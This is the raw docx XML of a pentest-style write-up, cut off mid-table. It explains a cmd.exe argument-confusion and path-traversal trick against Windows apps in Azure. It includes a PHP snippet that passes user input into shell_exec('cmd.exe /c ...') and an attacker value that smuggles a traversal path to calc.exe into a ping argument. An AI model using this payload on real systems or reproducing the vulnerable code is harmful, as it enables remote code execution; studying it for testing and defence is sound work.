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E1C1" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D8673B" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FD0C29" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Command Hijacking via Argument Confusion &amp; Path Traversal in cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C876E8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Exploit improperly sanitized command-line arguments in Windows systems (including those in Azure VMs or App Services) to hijack execution flow—ultimately achieving </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>remote code execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>lateral movement</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10867F58" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D01D60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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability Concept: cmd.exe Argument Confusion with Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503AD83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This technique abuses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>confusion in argument handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by cmd.exe when invoked with the /c switch. It's </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>not a bug</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in cmd.exe per se, but a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>logic flaw in how developers use it improperly</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, especially in PHP, Python, Node.js, or .NET applications that generate system commands dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092458EE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0D48001A">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="527449DF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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Exploit Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242DEAE" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cmd.exe /c "ping 127.0.0.1" → expected behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A659DEA" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Replace argument:</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../Windows/System32/calc.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>launches calc.exe instead of ping.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767F8A4" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why? Because cmd.exe interprets the full string as a command (not just an argument), and fails to resolve ping as a known binary when path traversal makes it a new executable path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA953A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1E38ADC1">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FBB041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🧵</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> How This Applies in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA593D1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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Common Azure Targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37248979" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Azure </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Windows Virtual Machines</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (especially legacy/line-of-business)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBACAEA" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Azure </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Web Apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Function Apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> running in Windows containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C073253" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Vulnerable apps hosted in Azure using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22604A" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shell_exec() in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4AAF5" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>subprocess.run() in Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF5C0F" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Process.Start() in C#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B8A3C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Any app passing </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>user-controlled strings to cmd.exe /c without proper quoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2F106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7F6E8373">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0522C2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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step-by-Step Exploitation in Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913536D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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Precondition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75746C9D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The application or script running on a Windows system hosted in Azure must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77B228" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Invoke cmd.exe with /c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA6A65" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Include user input as part of the command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D07191" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Fail to wrap arguments in quotes properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1AF73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4DB5D7C6">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4BE91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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example Exploit Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719FC12D" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Target Command in Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2C8F8" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>$ip = $_GET['ip'];  // user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4A20C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>$cmd = "ping " . escapeshellcmd($ip);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE95291" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>shell_exec("cmd.exe /c \"$cmd\"");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1164F5" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses escapeshellcmd() — </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>but fails to quote the full argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455AF481" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Looks safe, but isn't!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62C91C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Attacker Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA259D" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>127.0.0.1/../../../../../../../../../../windows/system32/calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311EE33" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Final Command Run by cmd.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EBDF2A" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD106B" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCBC19F" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>calc.exe is executed instead of ping.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFDF0E" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Any binary path can be hijacked and executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD044F" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>RCE achieved</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> depending on app permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B3DF1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5423B0A7">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D407F6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🔥</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pentester’s Playbook (Azure Context)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651"/>
        <w:gridCol w:w="4382"/>
        <w:gridCol w:w="2828"/>
      </w:tblGrid>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="764BEDD2" w14:textId="77777777" w:rsidTr="001E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2582A" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US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43CF708" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia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1DDDB73" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Tool/Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1738BA33" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="5ED5F85C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9370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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🧭</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56F81D28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Identify apps calling cmd.exe with /c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
